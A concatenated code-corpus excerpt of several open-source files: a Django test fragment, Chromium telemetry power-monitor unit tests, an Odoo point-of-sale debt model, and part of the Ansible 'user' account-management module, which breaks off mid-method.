def test_html_safe_doesnt_define_str(self):
method_name = '__unicode__()' if six.PY2 else '__str__()'
msg = "can't apply @html_safe to HtmlClass because it doesn't define %s." % method_name
with self.assertRaisesMessage(ValueError, msg):
@html.html_safe
class HtmlClass(object):
pass
|
bsd-3-clause
|
js0701/chromium-crosswalk
|
tools/telemetry/telemetry/internal/platform/power_monitor/sysfs_power_monitor_unittest.py
|
14
|
9018
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.internal.platform import android_platform_backend
from telemetry.internal.platform.power_monitor import sysfs_power_monitor
class SysfsPowerMonitorMonitorTest(unittest.TestCase):
initial_freq = {
'cpu0': '1700000 6227\n1600000 0\n1500000 0\n1400000 28\n1300000 22\n'
'1200000 14\n1100000 19\n1000000 22\n900000 14\n800000 20\n'
'700000 15\n600000 23\n500000 23\n400000 9\n300000 28\n200000 179',
'cpu1': '1700000 11491\n1600000 0\n1500000 0\n1400000 248\n1300000 1166\n'
'1200000 2082\n1100000 2943\n1000000 6560\n900000 12517\n'
'800000 8690\n700000 5105\n600000 3800\n500000 5131\n400000 5479\n'
'300000 7571\n200000 133618',
'cpu2': '1700000 1131',
'cpu3': '1700000 1131'
}
final_freq = {
'cpu0': '1700000 7159\n1600000 0\n1500000 0\n1400000 68\n1300000 134\n'
'1200000 194\n1100000 296\n1000000 716\n900000 1301\n800000 851\n'
'700000 554\n600000 343\n500000 612\n400000 691\n300000 855\n'
'200000 15525',
'cpu1': '1700000 12048\n1600000 0\n1500000 0\n1400000 280\n1300000 1267\n'
'1200000 2272\n1100000 3163\n1000000 7039\n900000 13800\n'
'800000 9599\n700000 5655\n600000 4144\n500000 5655\n400000 6005\n'
'300000 8288\n200000 149724',
'cpu2': None,
'cpu3': ''
}
expected_initial_freq = {
'cpu0': {
1700000000: 6227,
1600000000: 0,
1500000000: 0,
1400000000: 28,
1300000000: 22,
1200000000: 14,
1100000000: 19,
1000000000: 22,
900000000: 14,
800000000: 20,
700000000: 15,
600000000: 23,
500000000: 23,
400000000: 9,
300000000: 28,
200000000: 179
},
'cpu1': {
1700000000: 11491,
1600000000: 0,
1500000000: 0,
1400000000: 248,
1300000000: 1166,
1200000000: 2082,
1100000000: 2943,
1000000000: 6560,
900000000: 12517,
800000000: 8690,
700000000: 5105,
600000000: 3800,
500000000: 5131,
400000000: 5479,
300000000: 7571,
200000000: 133618
},
'cpu2': {
1700000000: 1131
},
'cpu3': {
1700000000: 1131
}
}
expected_final_freq = {
'cpu0': {
1700000000: 7159,
1600000000: 0,
1500000000: 0,
1400000000: 68,
1300000000: 134,
1200000000: 194,
1100000000: 296,
1000000000: 716,
900000000: 1301,
800000000: 851,
700000000: 554,
600000000: 343,
500000000: 612,
400000000: 691,
300000000: 855,
200000000: 15525
},
'cpu1': {
1700000000: 12048,
1600000000: 0,
1500000000: 0,
1400000000: 280,
1300000000: 1267,
1200000000: 2272,
1100000000: 3163,
1000000000: 7039,
900000000: 13800,
800000000: 9599,
700000000: 5655,
600000000: 4144,
500000000: 5655,
400000000: 6005,
300000000: 8288,
200000000: 149724
},
'cpu2': None,
'cpu3': {}
}
expected_freq_percents = {
'platform_info': {
1700000000: 3.29254111574526,
1600000000: 0.0,
1500000000: 0.0,
1400000000: 0.15926805099535601,
1300000000: 0.47124116307273645,
1200000000: 0.818756100807525,
1100000000: 1.099381692400982,
1000000000: 2.5942528544384302,
900000000: 5.68661122326737,
800000000: 3.850545467654628,
700000000: 2.409691872245393,
600000000: 1.4693702487650486,
500000000: 2.4623575553879373,
400000000: 2.672038150383057,
300000000: 3.415770495015825,
200000000: 69.59817400982045
},
'cpu0': {
1700000000: 4.113700564971752,
1600000000: 0.0,
1500000000: 0.0,
1400000000: 0.1765536723163842,
1300000000: 0.4943502824858757,
1200000000: 0.7944915254237288,
1100000000: 1.2226341807909604,
1000000000: 3.0632062146892656,
900000000: 5.680614406779661,
800000000: 3.6679025423728815,
700000000: 2.379060734463277,
600000000: 1.4124293785310735,
500000000: 2.599752824858757,
400000000: 3.0102401129943503,
300000000: 3.650247175141243,
200000000: 67.73481638418079
},
'cpu1': {
1700000000: 2.4713816665187682,
1600000000: 0.0,
1500000000: 0.0,
1400000000: 0.1419824296743278,
1300000000: 0.44813204365959713,
1200000000: 0.8430206761913214,
1100000000: 0.9761292040110037,
1000000000: 2.1252994941875945,
900000000: 5.69260803975508,
800000000: 4.033188392936374,
700000000: 2.4403230100275093,
600000000: 1.526311118999024,
500000000: 2.3249622859171177,
400000000: 2.3338361877717633,
300000000: 3.1812938148904073,
200000000: 71.46153163546012
},
'cpu2': {
1700000000: 0.0,
},
'cpu3': {
1700000000: 0.0,
}
}
def testParseCpuFreq(self):
initial = sysfs_power_monitor.SysfsPowerMonitor.ParseFreqSample(
self.initial_freq)
final = sysfs_power_monitor.SysfsPowerMonitor.ParseFreqSample(
self.final_freq)
self.assertDictEqual(initial, self.expected_initial_freq)
self.assertDictEqual(final, self.expected_final_freq)
def testComputeCpuStats(self):
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
self.expected_initial_freq, self.expected_final_freq)
for cpu in self.expected_freq_percents:
for freq in results[cpu]:
self.assertAlmostEqual(results[cpu][freq],
self.expected_freq_percents[cpu][freq])
def testComputeCpuStatsWithMissingData(self):
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
{'cpu1': {}}, {'cpu1': {}})
self.assertEqual(results['cpu1'][12345], 0)
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
{'cpu1': {123: 0}}, {'cpu1': {123: 0}})
self.assertEqual(results['cpu1'][123], 0)
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
{'cpu1': {123: 456}}, {'cpu1': {123: 456}})
self.assertEqual(results['cpu1'][123], 0)
def testComputeCpuStatsWithNumberChange(self):
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
{'cpu1': {'C0': 10, 'WFI': 20}},
{'cpu1': {'C0': 20, 'WFI': 10}})
self.assertEqual(results['cpu1']['C0'], 0)
self.assertEqual(results['cpu1']['WFI'], 0)
def testGetCpuStateForAndroidDevices(self):
class PlatformStub(object):
def __init__(self, run_command_return_value):
self._run_command_return_value = run_command_return_value
def RunCommand(self, cmd):
del cmd # unused
return self._run_command_return_value
def PathExists(self, path):
return 'cpu0' in path or 'cpu1' in path
cpu_state_from_samsung_note3 = (
"C0\n\nC1\n\nC2\n\nC3\n\n"
"53658520886\n1809072\n7073\n1722554\n"
"1\n35\n300\n500\n"
"1412949256\n")
expected_cstate_dict = {
'C0': 1412895593940415,
'C1': 1809072,
'C2': 7073,
'C3': 1722554,
'WFI': 53658520886
}
cpus = ["cpu%d" % cpu for cpu in range(4)]
expected_result = dict(zip(cpus, [expected_cstate_dict]*2))
sysfsmon = sysfs_power_monitor.SysfsPowerMonitor(
PlatformStub(cpu_state_from_samsung_note3))
# pylint: disable=protected-access
sysfsmon._cpus = cpus
cstate = sysfsmon.GetCpuState()
result = android_platform_backend.AndroidPlatformBackend.ParseCStateSample(
cstate)
self.assertDictEqual(expected_result, result)
def testStandAlone(self):
class PlatformStub(object):
def __init__(self, run_command_return_value):
self._run_command_return_value = run_command_return_value
def RunCommand(self, cmd):
del cmd # unused
return self._run_command_return_value
def PathExists(self, path):
del path # unused
return True
cpu_state_from_samsung_note3 = (
"C0\n\nC1\n\nC2\n\nC3\n\n"
"53658520886\n1809072\n7073\n1722554\n"
"1\n35\n300\n500\n"
"1412949256\n")
expected_cstate_dict = {
'C0': 1412895593940415,
'C1': 1809072,
'C2': 7073,
'C3': 1722554,
'WFI': 53658520886
}
cpus = ["cpu%d" % cpu for cpu in range(2)]
expected_result = dict(zip(cpus, [expected_cstate_dict]*len(cpus)))
sysfsmon = sysfs_power_monitor.SysfsPowerMonitor(
PlatformStub(cpu_state_from_samsung_note3), standalone=True)
# pylint: disable=protected-access
sysfsmon._cpus = cpus
cstate = sysfsmon.GetCpuState()
result = android_platform_backend.AndroidPlatformBackend.ParseCStateSample(
cstate)
self.assertDictEqual(expected_result, result)
|
bsd-3-clause
|
Endika/pos-addons
|
pos_debt_notebook/models.py
|
9
|
2190
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api
import openerp.addons.decimal_precision as dp
class ResPartner(models.Model):
_inherit = 'res.partner'
@api.multi
def _get_debt(self):
debt_account = self.env.ref('pos_debt_notebook.debt_account')
debt_journal = self.env.ref('pos_debt_notebook.debt_journal')
self._cr.execute(
"""SELECT l.partner_id, SUM(l.debit - l.credit)
FROM account_move_line l
WHERE l.account_id = %s AND l.partner_id IN %s
GROUP BY l.partner_id
""",
(debt_account.id, tuple(self.ids)))
res = {}
for partner in self:
res[partner.id] = 0
for partner_id, val in self._cr.fetchall():
res[partner_id] += val
statements = self.env['account.bank.statement'].search(
[('journal_id', '=', debt_journal.id), ('state', '=', 'open')])
if statements:
self._cr.execute(
"""SELECT l.partner_id, SUM(l.amount)
FROM account_bank_statement_line l
WHERE l.statement_id IN %s AND l.partner_id IN %s
GROUP BY l.partner_id
""",
(tuple(statements.ids), tuple(self.ids)))
for partner_id, val in self._cr.fetchall():
res[partner_id] += val
for partner in self:
partner.debt = res[partner.id]
debt = fields.Float(
compute='_get_debt', string='Debt', readonly=True,
digits=dp.get_precision('Account'))
class AccountJournal(models.Model):
_inherit = 'account.journal'
debt = fields.Boolean(string='Debt Payment Method')
class PosConfig(models.Model):
_inherit = 'pos.config'
debt_dummy_product_id = fields.Many2one(
'product.product', string='Dummy Product for Debt',
domain=[('available_in_pos', '=', True)], required=True,
help="Dummy product used when a customer pays his debt "
"without ordering new products. This is a workaround to the fact "
"that Odoo needs to have at least one product on the order to "
"validate the transaction.")
|
lgpl-3.0
|
ferrants/ansible-modules-core
|
system/user.py
|
13
|
70584
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Stephen Fromm <sfromm@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: user
author: Stephen Fromm
version_added: "0.2"
short_description: Manage user accounts
requirements: [ useradd, userdel, usermod ]
description:
- Manage user accounts and user attributes.
options:
name:
required: true
aliases: [ "user" ]
description:
- Name of the user to create, remove or modify.
comment:
required: false
description:
- Optionally sets the description (aka I(GECOS)) of user account.
uid:
required: false
description:
- Optionally sets the I(UID) of the user.
non_unique:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- Optionally when used with the -u option, this option allows to
change the user ID to a non-unique value.
version_added: "1.1"
group:
required: false
description:
- Optionally sets the user's primary group (takes a group name).
groups:
required: false
description:
- Puts the user in this comma-delimited list of groups. When set to
the empty string ('groups='), the user is removed from all groups
except the primary group.
append:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- If C(yes), will only add groups, not set them to just the list
in I(groups).
shell:
required: false
description:
- Optionally set the user's shell.
home:
required: false
description:
- Optionally set the user's home directory.
password:
required: false
description:
- Optionally set the user's password to this crypted value. See
the user example in the github examples directory for what this looks
like in a playbook. The `FAQ <http://docs.ansible.com/faq.html#how-do-i-generate-crypted-passwords-for-the-user-module>`_
contains details on various ways to generate these password values.
Note on Darwin system, this value has to be cleartext.
Beware of security issues.
state:
required: false
default: "present"
choices: [ present, absent ]
description:
- Whether the account should exist or not, taking action if the state is different from what is stated.
createhome:
required: false
default: "yes"
choices: [ "yes", "no" ]
description:
- Unless set to C(no), a home directory will be made for the user
when the account is created or if the home directory does not
exist.
move_home:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- If set to C(yes) when used with C(home=), attempt to move the
user's home directory to the specified directory if it isn't there
already.
system:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- When creating an account, setting this to C(yes) makes the user a
system account. This setting cannot be changed on existing users.
force:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- When used with C(state=absent), behavior is as with
C(userdel --force).
login_class:
required: false
description:
- Optionally sets the user's login class for FreeBSD, OpenBSD and NetBSD systems.
remove:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- When used with C(state=absent), behavior is as with
C(userdel --remove).
generate_ssh_key:
required: false
default: "no"
choices: [ "yes", "no" ]
version_added: "0.9"
description:
- Whether to generate a SSH key for the user in question.
This will B(not) overwrite an existing SSH key.
ssh_key_bits:
required: false
default: 2048
version_added: "0.9"
description:
- Optionally specify number of bits in SSH key to create.
ssh_key_type:
required: false
default: rsa
version_added: "0.9"
description:
- Optionally specify the type of SSH key to generate.
Available SSH key types will depend on implementation
present on target host.
ssh_key_file:
required: false
default: .ssh/id_rsa
version_added: "0.9"
description:
- Optionally specify the SSH key filename. If this is a relative
filename then it will be relative to the user's home directory.
ssh_key_comment:
required: false
default: ansible-generated on $HOSTNAME
version_added: "0.9"
description:
- Optionally define the comment for the SSH key.
ssh_key_passphrase:
required: false
version_added: "0.9"
description:
- Set a passphrase for the SSH key. If no
passphrase is provided, the SSH key will default to
having no passphrase.
update_password:
required: false
default: always
choices: ['always', 'on_create']
version_added: "1.3"
description:
- C(always) will update passwords if they differ. C(on_create) will only set the password for newly created users.
expires:
version_added: "1.9"
required: false
default: "None"
description:
- An expiry time for the user in epoch, it will be ignored on platforms that do not support this.
Currently supported on Linux and FreeBSD.
'''
EXAMPLES = '''
# Add the user 'johnd' with a specific uid and a primary group of 'admin'
- user: name=johnd comment="John Doe" uid=1040 group=admin
# Add the user 'james' with a bash shell, appending the group 'admins' and 'developers' to the user's groups
- user: name=james shell=/bin/bash groups=admins,developers append=yes
# Remove the user 'johnd'
- user: name=johnd state=absent remove=yes
# Create a 2048-bit SSH key for user jsmith in ~jsmith/.ssh/id_rsa
- user: name=jsmith generate_ssh_key=yes ssh_key_bits=2048 ssh_key_file=.ssh/id_rsa
# added a consultant whose account you want to expire
- user: name=james18 shell=/bin/zsh groups=developers expires=1422403387
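# Set an already-crypted password for the user 'alice' (illustrative only: the
# $6$ hash below is a placeholder; generate a real SHA-512 crypt value yourself,
# e.g. with "mkpasswd --method=sha-512" or Python's crypt module)
- user: name=alice password=$6$examplesalt$examplehashedvalue update_password=on_create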
'''
import os
import pwd
import grp
import syslog
import platform
import socket
import time
try:
import spwd
HAVE_SPWD=True
except:
HAVE_SPWD=False
class User(object):
"""
This is a generic User manipulation class that is subclassed
based on platform.
A subclass may wish to override the following action methods:-
- create_user()
- remove_user()
- modify_user()
- ssh_key_gen()
- ssh_key_fingerprint()
- user_exists()
All subclasses MUST define platform and distribution (which may be None).
"""
platform = 'Generic'
distribution = None
SHADOWFILE = '/etc/shadow'
    DATE_FORMAT = '%Y-%m-%d'
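    # A minimal sketch of a platform subclass following the docstring contract
    # above (illustrative only; the class name and the 'pw' command shown are
    # assumptions, not the real FreeBSD implementation shipped with this module):
    #
    #     class HypotheticalBSDUser(User):
    #         platform = 'FreeBSD'
    #         distribution = None
    #
    #         def create_user(self):
    #             cmd = [self.module.get_bin_path('pw', True), 'useradd', '-n', self.name]
    #             return self.execute_command(cmd)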
def __new__(cls, *args, **kwargs):
return load_platform_subclass(User, args, kwargs)
def __init__(self, module):
self.module = module
self.state = module.params['state']
self.name = module.params['name']
self.uid = module.params['uid']
self.non_unique = module.params['non_unique']
self.group = module.params['group']
self.groups = module.params['groups']
self.comment = module.params['comment']
self.home = module.params['home']
self.shell = module.params['shell']
self.password = module.params['password']
self.force = module.params['force']
self.remove = module.params['remove']
self.createhome = module.params['createhome']
self.move_home = module.params['move_home']
self.system = module.params['system']
self.login_class = module.params['login_class']
self.append = module.params['append']
self.sshkeygen = module.params['generate_ssh_key']
self.ssh_bits = module.params['ssh_key_bits']
self.ssh_type = module.params['ssh_key_type']
self.ssh_comment = module.params['ssh_key_comment']
self.ssh_passphrase = module.params['ssh_key_passphrase']
self.update_password = module.params['update_password']
self.expires = None
if module.params['expires']:
try:
self.expires = time.gmtime(module.params['expires'])
except Exception,e:
                module.fail_json(msg="Invalid expires time %s: %s" % (self.expires, str(e)))
if module.params['ssh_key_file'] is not None:
self.ssh_file = module.params['ssh_key_file']
else:
self.ssh_file = os.path.join('.ssh', 'id_%s' % self.ssh_type)
# select whether we dump additional debug info through syslog
self.syslogging = False
def execute_command(self, cmd, use_unsafe_shell=False, data=None):
if self.syslogging:
syslog.openlog('ansible-%s' % os.path.basename(__file__))
syslog.syslog(syslog.LOG_NOTICE, 'Command %s' % '|'.join(cmd))
return self.module.run_command(cmd, use_unsafe_shell=use_unsafe_shell, data=data)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.force:
cmd.append('-f')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self, command_name='useradd'):
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
elif self.group_exists(self.name):
# use the -N option (no user group) if a group already
# exists with the same name as the user to prevent
# errors from useradd trying to create a group when
# USERGROUPS_ENAB is set in /etc/login.defs.
if os.path.exists('/etc/redhat-release'):
dist = platform.dist()
major_release = int(dist[1].split('.')[0])
if major_release <= 5:
cmd.append('-n')
else:
cmd.append('-N')
else:
cmd.append('-N')
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.expires:
cmd.append('--expiredate')
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.createhome:
cmd.append('-m')
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def _check_usermod_append(self):
# check if this version of usermod can append groups
usermod_path = self.module.get_bin_path('usermod', True)
# for some reason, usermod --help cannot be used by non root
# on RH/Fedora, due to lack of execute bit for others
if not os.access(usermod_path, os.X_OK):
return False
cmd = [usermod_path]
cmd.append('--help')
rc, data1, data2 = self.execute_command(cmd)
helpout = data1 + data2
# check if --append exists
lines = helpout.split('\n')
for line in lines:
if line.strip().startswith('-a, --append'):
return True
return False
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
has_append = self._check_usermod_append()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
if has_append:
cmd.append('-a')
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if self.append and not has_append:
cmd.append('-A')
cmd.append(','.join(group_diff))
else:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.expires:
cmd.append('--expiredate')
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
elif self.module.check_mode:
return (0, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
def group_exists(self,group):
try:
# Try group as a gid first
grp.getgrgid(int(group))
return True
except (ValueError, KeyError):
try:
grp.getgrnam(group)
return True
except KeyError:
return False
def group_info(self, group):
if not self.group_exists(group):
return False
try:
# Try group as a gid first
return list(grp.getgrgid(int(group)))
except (ValueError, KeyError):
return list(grp.getgrnam(group))
def get_groups_set(self, remove_existing=True):
if self.groups is None:
return None
info = self.user_info()
groups = set(filter(None, self.groups.split(',')))
for g in set(groups):
if not self.group_exists(g):
self.module.fail_json(msg="Group %s does not exist" % (g))
if info and remove_existing and self.group_info(g)[2] == info[3]:
groups.remove(g)
return groups
def user_group_membership(self):
groups = []
info = self.get_pwd_info()
for group in grp.getgrall():
if self.name in group.gr_mem and not info[3] == group.gr_gid:
groups.append(group[0])
return groups
def user_exists(self):
try:
if pwd.getpwnam(self.name):
return True
except KeyError:
return False
def get_pwd_info(self):
if not self.user_exists():
return False
return list(pwd.getpwnam(self.name))
def user_info(self):
if not self.user_exists():
return False
info = self.get_pwd_info()
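# an empty or single-character password field (e.g. 'x' or '*') means the
# real hash lives in the shadow database, so fetch it from there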
if len(info[1]) == 1 or len(info[1]) == 0:
info[1] = self.user_password()
return info
def user_password(self):
passwd = ''
if HAVE_SPWD:
try:
passwd = spwd.getspnam(self.name)[1]
except KeyError:
return passwd
if not self.user_exists():
return passwd
else:
# Read shadow file for user's encrypted password string
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
for line in open(self.SHADOWFILE).readlines():
if line.startswith('%s:' % self.name):
passwd = line.split(':')[1]
return passwd
def get_ssh_key_path(self):
info = self.user_info()
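# info[5] is the home directory from the passwd entry; relative key paths
# are resolved against it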
if os.path.isabs(self.ssh_file):
ssh_key_file = self.ssh_file
else:
ssh_key_file = os.path.join(info[5], self.ssh_file)
return ssh_key_file
def ssh_key_gen(self):
info = self.user_info()
if not os.path.exists(info[5]):
return (1, '', 'User %s home directory does not exist' % self.name)
ssh_key_file = self.get_ssh_key_path()
ssh_dir = os.path.dirname(ssh_key_file)
if not os.path.exists(ssh_dir):
try:
os.mkdir(ssh_dir, 0700)
os.chown(ssh_dir, info[2], info[3])
except OSError, e:
return (1, '', 'Failed to create %s: %s' % (ssh_dir, str(e)))
if os.path.exists(ssh_key_file):
return (None, 'Key already exists', '')
cmd = [self.module.get_bin_path('ssh-keygen', True)]
cmd.append('-t')
cmd.append(self.ssh_type)
cmd.append('-b')
cmd.append(self.ssh_bits)
cmd.append('-C')
cmd.append(self.ssh_comment)
cmd.append('-f')
cmd.append(ssh_key_file)
cmd.append('-N')
if self.ssh_passphrase is not None:
cmd.append(self.ssh_passphrase)
else:
cmd.append('')
(rc, out, err) = self.execute_command(cmd)
if rc == 0:
# If the keys were successfully created, we should be able
# to tweak ownership.
os.chown(ssh_key_file, info[2], info[3])
os.chown('%s.pub' % ssh_key_file, info[2], info[3])
return (rc, out, err)
def ssh_key_fingerprint(self):
ssh_key_file = self.get_ssh_key_path()
if not os.path.exists(ssh_key_file):
return (1, 'SSH Key file %s does not exist' % ssh_key_file, '')
cmd = [ self.module.get_bin_path('ssh-keygen', True) ]
cmd.append('-l')
cmd.append('-f')
cmd.append(ssh_key_file)
return self.execute_command(cmd)
def get_ssh_public_key(self):
ssh_public_key_file = '%s.pub' % self.get_ssh_key_path()
try:
f = open(ssh_public_key_file)
ssh_public_key = f.read().strip()
f.close()
except IOError:
return None
return ssh_public_key
def create_user(self):
# by default we use the create_user_useradd method
return self.create_user_useradd()
def remove_user(self):
# by default we use the remove_user_userdel method
return self.remove_user_userdel()
def modify_user(self):
# by default we use the modify_user_usermod method
return self.modify_user_usermod()
def create_homedir(self, path):
if not os.path.exists(path):
# use /etc/skel if possible
if os.path.exists('/etc/skel'):
try:
shutil.copytree('/etc/skel', path, symlinks=True)
except OSError, e:
self.module.exit_json(failed=True, msg="%s" % e)
else:
try:
os.makedirs(path)
except OSError, e:
self.module.exit_json(failed=True, msg="%s" % e)
def chown_homedir(self, uid, gid, path):
try:
os.chown(path, uid, gid)
for root, dirs, files in os.walk(path):
for d in dirs:
os.chown(os.path.join(root, d), uid, gid)
for f in files:
os.chown(os.path.join(root, f), uid, gid)
except OSError, e:
self.module.exit_json(failed=True, msg="%s" % e)
# ===========================================
class FreeBsdUser(User):
"""
This is a FreeBSD User manipulation class - it uses the pw command
to manipulate the user database, followed by the chpass command
to change the password.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'FreeBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def remove_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'userdel',
'-n',
self.name
]
if self.remove:
cmd.append('-r')
return self.execute_command(cmd)
def create_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'useradd',
'-n',
self.name,
]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.createhome:
cmd.append('-m')
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.expires:
days = (time.mktime(self.expires) - time.time()) / 86400
cmd.append('-e')
cmd.append(str(int(days)))
# system cannot be handled currently - should we error if it's requested?
# create the user
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
# we have to set the password in a second command
if self.password is not None:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
return (rc, out, err)
def modify_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'usermod',
'-n',
self.name
]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
for line in open(self.SHADOWFILE).readlines():
if line.startswith('%s:' % self.name):
user_login_class = line.split(':')[4]
# act only if login_class change
if self.login_class != user_login_class:
cmd.append('-L')
cmd.append(self.login_class)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups = groups | set(current_groups)
cmd.append(','.join(new_groups))
if self.expires:
days = (time.mktime(self.expires) - time.time()) / 86400
cmd.append('-e')
cmd.append(str(int(days)))
# modify the user if cmd will do anything
if cmd_len != len(cmd):
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password in a second command
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
return (rc, out, err)
# ===========================================
class OpenBSDUser(User):
"""
This is an OpenBSD User manipulation class.
Main differences are that OpenBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'OpenBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.createhome:
cmd.append('-m')
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
